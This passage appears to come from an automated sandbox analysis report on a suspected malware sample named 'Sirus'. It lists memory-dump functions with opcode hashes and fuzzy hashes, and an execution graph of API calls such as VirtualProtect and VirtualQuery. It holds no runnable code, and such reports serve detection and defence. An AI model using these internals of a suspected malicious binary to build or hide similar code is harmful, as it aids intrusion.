                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 402bb61d99a11ac031d905b626a6a0aebd143c882d964bf38b2fe4e25813886c
                                                    • Instruction ID: 4a7108fcb956fa5bce26b06abb402ce0e47e6680cfcf50822b19a6b046ea0180
                                                    • Opcode Fuzzy Hash: 402bb61d99a11ac031d905b626a6a0aebd143c882d964bf38b2fe4e25813886c
                                                    • Instruction Fuzzy Hash: D5D05E353042244BDB18AB29E845AA97399EB463A8708416DE906E7354DF64F84187D8
                                                    Function 05BFF018 Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e91d3fe77dbf73efa4a345fb6576f9d2af0d6db482032976c81470a341721272
                                                    • Instruction ID: eff77aaf3651bf9ab52dce3b3df90d01c277d3733bf3d236d58e143568e60cff
                                                    • Opcode Fuzzy Hash: e91d3fe77dbf73efa4a345fb6576f9d2af0d6db482032976c81470a341721272
                                                    • Instruction Fuzzy Hash: 61C0122270552816C746F365741035AB74D9F4A692F05005EE60CE7202CE89588447C9
                                                    Function 05BF7F28 Relevance: .0, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f83b139dbd152118f609790107c3c20a24ee42b7c95e7fda54567b9927e121e8
                                                    • Instruction ID: 65d6c200fd78a340a9bce8b2336b5da96db745c5b814c487d7cb3aecaf9eb4ba
                                                    • Opcode Fuzzy Hash: f83b139dbd152118f609790107c3c20a24ee42b7c95e7fda54567b9927e121e8
                                                    • Instruction Fuzzy Hash: 92E01774A4020ADFC700CFA4D099AADBFB1FF0C304F208099E116EB260CB30A808CF50
                                                    Function 05BF4E00 Relevance: .0, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 32eab2aade5e44f91f7b12a1f12be99e4fbdb569ff2941906b3ac264b0449212
                                                    • Instruction ID: dd11b7872cc1d336e97756c4ad5276883c7ef61e19ea3ee9dae0c550718c5e58
                                                    • Opcode Fuzzy Hash: 32eab2aade5e44f91f7b12a1f12be99e4fbdb569ff2941906b3ac264b0449212
                                                    • Instruction Fuzzy Hash: 78E0176141D7C49EDB139B28A819294BFB4AF03215F0A80DBD8809F067CB744509C722
                                                    Function 05BF7988 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5fc3d0973eb95c59b1b08f0b7867cb7cabf8fd91868f9148e6403214e922f738
                                                    • Instruction ID: ba16b4711a9c5478d898755db84862b151b0230261d047ba2643ed51e49f239b
                                                    • Opcode Fuzzy Hash: 5fc3d0973eb95c59b1b08f0b7867cb7cabf8fd91868f9148e6403214e922f738
                                                    • Instruction Fuzzy Hash: 4FD0A7300143518FEF01EF28E8D86483B21DF02339B108493D8444904FE734A217CF41
                                                    Function 05BF58EE Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 04d31d808d2a84a8dc17f90925d0eee5a9eda1e2395cab430a02fe14404b7316
                                                    • Instruction ID: 64f0c48f8c02cd4047fb0a089590b3e6f31e459d3e9c95b073fff41919b1d768
                                                    • Opcode Fuzzy Hash: 04d31d808d2a84a8dc17f90925d0eee5a9eda1e2395cab430a02fe14404b7316
                                                    • Instruction Fuzzy Hash: CEC080E7D14A0446D340397494873AC7720FB35211F521721C5D5151E2FD1461B74741
                                                    Function 05BFE188 Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a2a4801bbedc2d6f2156457974e218e084c2fdeb6cb06ffd94f1b4e93970250e
                                                    • Instruction ID: a5ff2a2d21cdde4ecca437dcd6fac464baaf1c1e8356e84cc73697d5c84e08b1
                                                    • Opcode Fuzzy Hash: a2a4801bbedc2d6f2156457974e218e084c2fdeb6cb06ffd94f1b4e93970250e
                                                    • Instruction Fuzzy Hash: 05B0123234863C130E0E319DB4148AD768E4E8697028000BBE60E97342CD877D9903DF
                                                    Function 05BFF028 Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a63def5139de9d73faf5875852bb5fba8a212dd085cb6ef3f47b932ebbaf416d
                                                    • Instruction ID: 7e4406d5a8e2c0384778edccfcf94a76deab9ffbd48e6b5977590d7107842c69
                                                    • Opcode Fuzzy Hash: a63def5139de9d73faf5875852bb5fba8a212dd085cb6ef3f47b932ebbaf416d
                                                    • Instruction Fuzzy Hash: CFB01272746538130E0E339E74154AEB28D4DC587024400ABE70D97341CD852D4143DE
                                                    Function 05BF4A88 Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a67735947409698bf476cb2ca68cd44975cbc3241d5938395f3166e654cbcaef
                                                    • Instruction ID: ce76eb5978a3bd655ba984aab26f5dfbd477b7ac2ba62d1aece33dd54f077107
                                                    • Opcode Fuzzy Hash: a67735947409698bf476cb2ca68cd44975cbc3241d5938395f3166e654cbcaef
                                                    • Instruction Fuzzy Hash: CAC08C7A300208BFDF80AFD8C841D56776DAB08710F50D400FA088E211C272ECA2DBA0
                                                    Function 05BF4A87 Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8ed4d9370922f15b5a471fd3c35e40c4563098d75d7861201b29acb4585601bf
                                                    • Instruction ID: 0336fdefab63a5a705a21b74368da152052d278d15dd736134ea2cdadd339a94
                                                    • Opcode Fuzzy Hash: 8ed4d9370922f15b5a471fd3c35e40c4563098d75d7861201b29acb4585601bf
                                                    • Instruction Fuzzy Hash: A3C0127A200208AFDB80AF94D881D957B29AB08610F109400FA088E211C272D9A39B90
                                                    Function 05BF5928 Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                    • Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
                                                    • Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                    • Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90
                                                    Function 05BF5927 Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6845c30fb37f62e7e0e63bce95d0fa761f98f7930f0edd663cadc0411524bed4
                                                    • Instruction ID: 96d302972e33265203362b86a57a9dd482e0a7c4286ab658478821761901ec3a
                                                    • Opcode Fuzzy Hash: 6845c30fb37f62e7e0e63bce95d0fa761f98f7930f0edd663cadc0411524bed4
                                                    • Instruction Fuzzy Hash: 78C00235140108AFC740DF54D485D95BB65EB59660B1180A1F9584B722C632D9129B80

                                                    Non-executed Functions

                                                    Function 025B10D4 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 9a13641de98cff9baa90dde59bc3298d6a7da3d03036ec613925e4bc2820dab7
                                                    • Instruction ID: 0e996c5359a68faf3b9fd72eb5846d26d367d990acdeb4f0448ccf14f5f82f25
                                                    • Opcode Fuzzy Hash: 9a13641de98cff9baa90dde59bc3298d6a7da3d03036ec613925e4bc2820dab7
                                                    • Instruction Fuzzy Hash: 7C41FEB4D006488FDB14CFA9D895AEEFBF1BF09304F209129E429BB250DB349845CF49
                                                    Function 025B10E0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: f987b3267648e9781c648cddb561d18f89fd5e30bb2db27b65d8cd0f68f3c930
                                                    • Instruction ID: 1593ec3d34ca296d810e26785652dc6faef7060407242925b98a55ab6b4a2b5e
                                                    • Opcode Fuzzy Hash: f987b3267648e9781c648cddb561d18f89fd5e30bb2db27b65d8cd0f68f3c930
                                                    • Instruction Fuzzy Hash: 6B41DEB4D006489FDB15CFA9D994ADEBBF1BF09304F209129E419AB250DB749885CF49
                                                    Function 05395F54 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979107600.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5390000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: a03e00cc2756d152b850cd6ce7cae458b665c27ad5baac1bda346b1b084977db
                                                    • Instruction ID: 7b258d6a162ff627dad41490570ea312e7ccae290d470afb9a5184af9263755f
                                                    • Opcode Fuzzy Hash: a03e00cc2756d152b850cd6ce7cae458b665c27ad5baac1bda346b1b084977db
                                                    • Instruction Fuzzy Hash: F231A8B9D052089FCF14CFA9D984A9EFBF5AB49310F20902AE819B7310D775A945CF94
                                                    Function 053993C9 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979107600.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5390000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    • Opcode ID: 6778053f17a6affc4ad36922d3ea9354c54cc9ae99bdca77888310a2daf2f407
                                                    • Instruction ID: b1cf3cf9646cc27932731324c941845c98e250ccb4d427ab5c71c929f1e596b0
                                                    • Opcode Fuzzy Hash: 6778053f17a6affc4ad36922d3ea9354c54cc9ae99bdca77888310a2daf2f407
                                                    • Instruction Fuzzy Hash: 6A31A6B9D012089FCF14CFA9D984A9EFBF1BB49310F24902AE819B7310D374AA45CF94
                                                    Function 025B7EB4 Relevance: .3, Instructions: 278COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976305200.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_25b0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 68fd76390561c47e7fc8ebcb7b73b90854ae286a2edd38b06ba412d1387b28e1
                                                    • Instruction ID: 70f5af30defd1c7e00df850b848c136b0e47deed6114fc3b868d291954478eb4
                                                    • Opcode Fuzzy Hash: 68fd76390561c47e7fc8ebcb7b73b90854ae286a2edd38b06ba412d1387b28e1
                                                    • Instruction Fuzzy Hash: F5C145B4A01205CFF300DFA9C68CA9ABFB6BF45305F55D458E0092F666C779A888CF58
                                                    Function 05BF1708 Relevance: .1, Instructions: 112COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1e845e86bcc4beb45d24a476219bf7f791ebce2f819ec842bcd9bd80e45403a8
                                                    • Instruction ID: 93d90e5034ea81632246418b8ec5b84cba5c90e319156507621a9c66eb83a71e
                                                    • Opcode Fuzzy Hash: 1e845e86bcc4beb45d24a476219bf7f791ebce2f819ec842bcd9bd80e45403a8
                                                    • Instruction Fuzzy Hash: 6D31B4B5E8E208CBCB40CE69D5019BAB67AAB57240F54B8A59109F7700F334DA06DB08
                                                    Function 05BF1718 Relevance: .1, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e8552b60127d910e6d8ca423441716da9c0f95844192ff52466154d1f7569ac3
                                                    • Instruction ID: dc094e7316e12580795aed2662a047af3408ddcb1cae96b5668036781d6799ff
                                                    • Opcode Fuzzy Hash: e8552b60127d910e6d8ca423441716da9c0f95844192ff52466154d1f7569ac3
                                                    • Instruction Fuzzy Hash: 572194B4E8E208DBCB40CE6DD5019BAB6BAA757240F54B8A5910DF7704F734DB16DB08

                                                    Execution Graph

                                                    Execution Coverage:2.4%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:2.5%
                                                    Total number of Nodes:829
                                                    Total number of Limit Nodes:2
                                                    execution_graph 2830 140001ac3 2831 140001a70 2830->2831 2832 14000199e 2831->2832 2833 140001b36 2831->2833 2836 140001b53 2831->2836 2835 140001a0f 2832->2835 2837 1400019e9 VirtualProtect 2832->2837 2834 140001ba0 4 API calls 2833->2834 2834->2836 2837->2832 1998 140001ae4 1999 140001a70 1998->1999 2000 14000199e 1999->2000 2001 140001b36 1999->2001 2004 140001b53 1999->2004 2003 140001a0f 2000->2003 2005 1400019e9 VirtualProtect 2000->2005 2006 140001ba0 2001->2006 2005->2000 2008 140001bc2 2006->2008 2007 140001c04 memcpy 2007->2004 2008->2007 2010 140001c45 VirtualQuery 2008->2010 2011 140001cf4 2008->2011 2010->2011 2015 140001c72 2010->2015 2012 140001d23 GetLastError 2011->2012 2013 140001d37 2012->2013 2014 140001ca4 VirtualProtect 2014->2007 2014->2012 2015->2007 2015->2014 2038 140001404 2111 140001394 2038->2111 2040 140001413 2041 140001394 2 API calls 2040->2041 2042 140001422 2041->2042 2043 140001394 2 API calls 2042->2043 2044 140001431 2043->2044 2045 140001394 2 API calls 2044->2045 2046 140001440 2045->2046 2047 140001394 2 API calls 2046->2047 2048 14000144f 2047->2048 2049 140001394 2 API calls 2048->2049 2050 14000145e 2049->2050 2051 140001394 2 API calls 2050->2051 2052 14000146d 2051->2052 2053 140001394 2 API calls 2052->2053 2054 14000147c 2053->2054 2055 140001394 2 API calls 2054->2055 2056 14000148b 2055->2056 2057 140001394 2 API calls 2056->2057 2058 14000149a 2057->2058 2059 140001394 2 API calls 2058->2059 2060 1400014a9 2059->2060 2061 140001394 2 API calls 2060->2061 2062 1400014b8 2061->2062 2063 140001394 2 API calls 2062->2063 2064 1400014c7 2063->2064 2065 140001394 2 API calls 2064->2065 2066 1400014d6 2065->2066 2067 1400014e5 2066->2067 2068 140001394 2 API calls 2066->2068 2069 140001394 2 API calls 2067->2069 2068->2067 2070 1400014ef 2069->2070 2071 1400014f4 2070->2071 2072 140001394 2 API calls 2070->2072 2073 140001394 2 API calls 2071->2073 2072->2071 2074 1400014fe 2073->2074 2075 140001503 2074->2075 2076 140001394 2 API calls 2074->2076 2077 140001394 2 API calls 2075->2077 2076->2075 2078 14000150d 2077->2078 2079 140001394 2 API calls 2078->2079 2080 140001512 2079->2080 2081 140001394 2 API calls 2080->2081 2082 140001521 2081->2082 2083 140001394 2 API calls 2082->2083 2084 140001530 2083->2084 2085 140001394 2 API calls 2084->2085 2086 14000153f 2085->2086 2087 140001394 2 API calls 2086->2087 2088 14000154e 2087->2088 2089 140001394 2 API calls 2088->2089 2090 14000155d 2089->2090 2091 140001394 2 API calls 2090->2091 2092 14000156c 2091->2092 2093 140001394 2 API calls 2092->2093 2094 14000157b 2093->2094 2095 140001394 2 API calls 2094->2095 2096 14000158a 2095->2096 2097 140001394 2 API calls 2096->2097 2098 140001599 2097->2098 2099 140001394 2 API calls 2098->2099 2100 1400015a8 2099->2100 2101 140001394 2 API calls 2100->2101 2102 1400015b7 2101->2102 2103 140001394 2 API calls 2102->2103 2104 1400015c6 2103->2104 2105 140001394 2 API calls 2104->2105 2106 1400015d5 2105->2106 2107 140001394 2 API calls 2106->2107 2108 1400015e4 2107->2108 2109 140001394 2 API calls 2108->2109 2110 1400015f3 2109->2110 2112 140005a60 malloc 2111->2112 2113 1400013b8 2112->2113 2114 1400013c6 NtClose 2113->2114 2114->2040 2115 140002104 2116 140002111 EnterCriticalSection 2115->2116 2117 140002218 2115->2117 2118 14000220b LeaveCriticalSection 2116->2118 2122 14000212e 2116->2122 2119 140002272 2117->2119 2121 140002241 DeleteCriticalSection 2117->2121 2118->2117 2120 14000214d TlsGetValue GetLastError 2120->2122 2121->2119 2122->2118 2122->2120 2016 14000216f 2017 140002185 2016->2017 2018 140002178 InitializeCriticalSection 2016->2018 2018->2017 2019 140001a70 2020 14000199e 2019->2020 2024 140001a7d 2019->2024 2021 140001a0f 2020->2021 2022 1400019e9 VirtualProtect 2020->2022 2022->2020 2023 140001b53 2024->2019 2024->2023 2025 140001b36 2024->2025 2026 140001ba0 4 API calls 2025->2026 2026->2023 2838 140002050 2839 14000205e EnterCriticalSection 2838->2839 2840 1400020cf 2838->2840 2841 1400020c2 LeaveCriticalSection 2839->2841 2842 140002079 2839->2842 2841->2840 2842->2841 2843 140001fd0 2844 140001fe4 2843->2844 2845 140002033 2843->2845 2844->2845 2846 140001ffd EnterCriticalSection LeaveCriticalSection 2844->2846 2846->2845 2131 140001ab3 2132 140001a70 2131->2132 2132->2131 2133 14000199e 2132->2133 2134 140001b36 2132->2134 2137 140001b53 2132->2137 2136 140001a0f 2133->2136 2138 1400019e9 VirtualProtect 2133->2138 2135 140001ba0 4 API calls 2134->2135 2135->2137 2138->2133 1988 140001394 1992 140005a60 1988->1992 1990 1400013b8 1991 1400013c6 NtClose 1990->1991 1993 140005a7e 1992->1993 1996 140005aab 1992->1996 1993->1990 1994 140005b53 1995 140005b6f malloc 1994->1995 1997 140005b90 1995->1997 1996->1993 1996->1994 1997->1993 2123 14000219e 2124 140002272 2123->2124 2125 1400021ab EnterCriticalSection 2123->2125 2126 140002265 LeaveCriticalSection 2125->2126 2128 1400021c8 2125->2128 2126->2124 2127 1400021e9 TlsGetValue GetLastError 2127->2128 2128->2126 2128->2127 2027 140001800 2028 140001812 2027->2028 2029 140001835 fprintf 2028->2029 2030 140001000 2031 14000108b __set_app_type 2030->2031 2032 140001040 2030->2032 2034 1400010b6 2031->2034 2032->2031 2033 1400010e5 2034->2033 2036 140001e00 2034->2036 2037 140005ff0 __setusermatherr 2036->2037 2129 140002320 strlen 2130 140002337 2129->2130 2139 140001140 2142 140001160 2139->2142 2141 140001156 2143 1400011b9 2142->2143 2144 14000118b 2142->2144 2145 1400011d3 2143->2145 2146 1400011c7 _amsg_exit 2143->2146 2144->2143 2147 1400011a0 Sleep 2144->2147 2148 140001201 _initterm 2145->2148 2149 14000121a 2145->2149 2146->2145 2147->2143 2147->2144 2148->2149 2165 140001880 2149->2165 2152 14000126a 2153 14000126f malloc 2152->2153 2154 14000128b 2153->2154 2156 1400012d0 2153->2156 2155 1400012a0 strlen malloc memcpy 2154->2155 2155->2155 2155->2156 2176 140003150 2156->2176 2158 140001315 2159 140001344 2158->2159 2160 140001324 2158->2160 2163 140001160 50 API calls 2159->2163 2161 140001338 2160->2161 2162 14000132d _cexit 2160->2162 2161->2141 2162->2161 2164 140001366 2163->2164 2164->2141 2166 140001247 SetUnhandledExceptionFilter 2165->2166 2167 1400018a2 2165->2167 2166->2152 2167->2166 2168 14000194d 2167->2168 2172 140001a20 2167->2172 2169 14000199e 2168->2169 2170 140001ba0 4 API calls 2168->2170 2169->2166 2171 1400019e9 VirtualProtect 2169->2171 2170->2168 2171->2169 2172->2169 2173 140001b53 2172->2173 2174 140001b36 2172->2174 2175 140001ba0 4 API calls 2174->2175 2175->2173 2179 140003166 2176->2179 2177 140003291 wcslen 2250 14000153f 2177->2250 2179->2177 2181 14000348e 2181->2158 2187 14000338c 2188 140003434 wcslen 2187->2188 2189 14000344a 2188->2189 2191 14000348c 2188->2191 2189->2191 2192 140003476 wcslen 2189->2192 2190 140003551 wcscpy wcscat 2194 140003583 2190->2194 2191->2190 2192->2189 2192->2191 2193 1400035d3 wcscpy wcscat 2196 140003609 2193->2196 2194->2193 2195 14000371e wcscpy wcscat 2197 140003757 2195->2197 2196->2195 2198 140003aab wcslen 2197->2198 2199 140003ab9 2198->2199 2200 140003aeb 2198->2200 2199->2200 2202 140003ad6 wcslen 2199->2202 2201 140003bfa wcscpy wcscat 2200->2201 2204 140003c2f 2201->2204 2202->2199 2202->2200 2203 140003c7f wcscpy wcscat 2206 140003cb8 2203->2206 2204->2203 2205 140003cf5 wcscpy wcscat 2208 140003d3c 2205->2208 2206->2205 2207 140003d8e wcscpy wcscat wcslen 2390 14000146d 2207->2390 2208->2207 2213 140003ea5 2476 1400014a9 2213->2476 2214 140003fe8 2216 14000145e 2 API calls 2214->2216 2223 140003f3c 2216->2223 2218 140003fd7 2220 14000145e 2 API calls 2218->2220 2219 1400056e7 2220->2223 2222 14000407a wcscpy wcscat wcslen 2235 140004150 2222->2235 2223->2219 2223->2222 2226 140003f30 2227 14000145e 2 API calls 2226->2227 2227->2223 2228 140004245 wcslen 2229 14000153f 2 API calls 2228->2229 2229->2235 2230 14000530a memcpy 2230->2235 2231 14000443b wcslen 2637 14000157b 2231->2637 2232 1400046ad wcslen 2233 14000153f 2 API calls 2232->2233 2233->2235 2235->2228 2235->2230 2235->2231 2235->2232 2236 140004fa1 wcscpy wcscat wcslen 2235->2236 2239 140004533 wcslen 2235->2239 2242 1400050e3 2235->2242 2243 14000546c memcpy 2235->2243 2244 1400026e0 9 API calls 2235->2244 2245 14000518e wcslen 2235->2245 2247 140004df5 wcscpy wcscat wcslen 2235->2247 2249 14000145e NtClose malloc 2235->2249 2592 1400014d6 2235->2592 2665 140001521 2235->2665 2763 140001431 2235->2763 2237 140001422 2 API calls 2236->2237 2237->2235 2654 1400015a8 2239->2654 2242->2158 2243->2235 2244->2235 2246 1400015a8 2 API calls 2245->2246 2246->2235 2694 140001422 2247->2694 2249->2235 2251 140001394 2 API calls 2250->2251 2252 14000154e 2251->2252 2253 140001394 2 API calls 2252->2253 2254 14000155d 2253->2254 2255 140001394 2 API calls 2254->2255 2256 14000156c 2255->2256 2257 140001394 2 API calls 2256->2257 2258 14000157b 2257->2258 2259 140001394 2 API calls 2258->2259 2260 14000158a 2259->2260 2261 140001394 2 API calls 2260->2261 2262 140001599 2261->2262 2263 140001394 2 API calls 2262->2263 2264 1400015a8 2263->2264 2265 140001394 2 API calls 2264->2265 2266 1400015b7 2265->2266 2267 140001394 2 API calls 2266->2267 2268 1400015c6 2267->2268 2269 140001394 2 API calls 2268->2269 2270 1400015d5 2269->2270 2271 140001394 2 API calls 2270->2271 2272 1400015e4 2271->2272 2273 140001394 2 API calls 2272->2273 2274 1400015f3 2273->2274 2274->2181 2275 140001503 2274->2275 2276 140001394 2 API calls 2275->2276 2277 14000150d 2276->2277 2278 140001394 2 API calls 2277->2278 2279 140001512 2278->2279 2280 140001394 2 API calls 2279->2280 2281 140001521 2280->2281 2282 140001394 2 API calls 2281->2282 2283 140001530 2282->2283 2284 140001394 2 API calls 2283->2284 2285 14000153f 2284->2285 2286 140001394 2 API calls 2285->2286 2287 14000154e 2286->2287 2288 140001394 2 API calls 2287->2288 2289 14000155d 2288->2289 2290 140001394 2 API calls 2289->2290 2291 14000156c 2290->2291 2292 140001394 2 API calls 2291->2292 2293 14000157b 2292->2293 2294 140001394 2 API calls 2293->2294 2295 14000158a 2294->2295 2296 140001394 2 API calls 2295->2296 2297 140001599 2296->2297 2298 140001394 2 API calls 2297->2298 2299 1400015a8 2298->2299 2300 140001394 2 API calls 2299->2300 2301 1400015b7 2300->2301 2302 140001394 2 API calls 2301->2302 2303 1400015c6 2302->2303 2304 140001394 2 API calls 2303->2304 2305 1400015d5 2304->2305 2306 140001394 2 API calls 2305->2306 2307 1400015e4 2306->2307 2308 140001394 2 API calls 2307->2308 2309 1400015f3 2308->2309 2309->2187 2310 14000156c 2309->2310 2311 140001394 2 API calls 2310->2311 2312 14000157b 2311->2312 2313 140001394 2 API calls 2312->2313 2314 14000158a 2313->2314 2315 140001394 2 API calls 2314->2315 2316 140001599 2315->2316 2317 140001394 2 API calls 2316->2317 2318 1400015a8 2317->2318 2319 140001394 2 API calls 2318->2319 2320 1400015b7 2319->2320 2321 140001394 2 API calls 2320->2321 2322 1400015c6 2321->2322 2323 140001394 2 API calls 2322->2323 2324 1400015d5 2323->2324 2325 140001394 2 API calls 2324->2325 2326 1400015e4 2325->2326 2327 140001394 2 API calls 2326->2327 2328 1400015f3 2327->2328 2328->2187 2329 14000145e 2328->2329 2330 140001394 2 API calls 2329->2330 2331 14000146d 2330->2331 2332 140001394 2 API calls 2331->2332 2333 14000147c 2332->2333 2334 140001394 2 API calls 2333->2334 2335 14000148b 2334->2335 2336 140001394 2 API calls 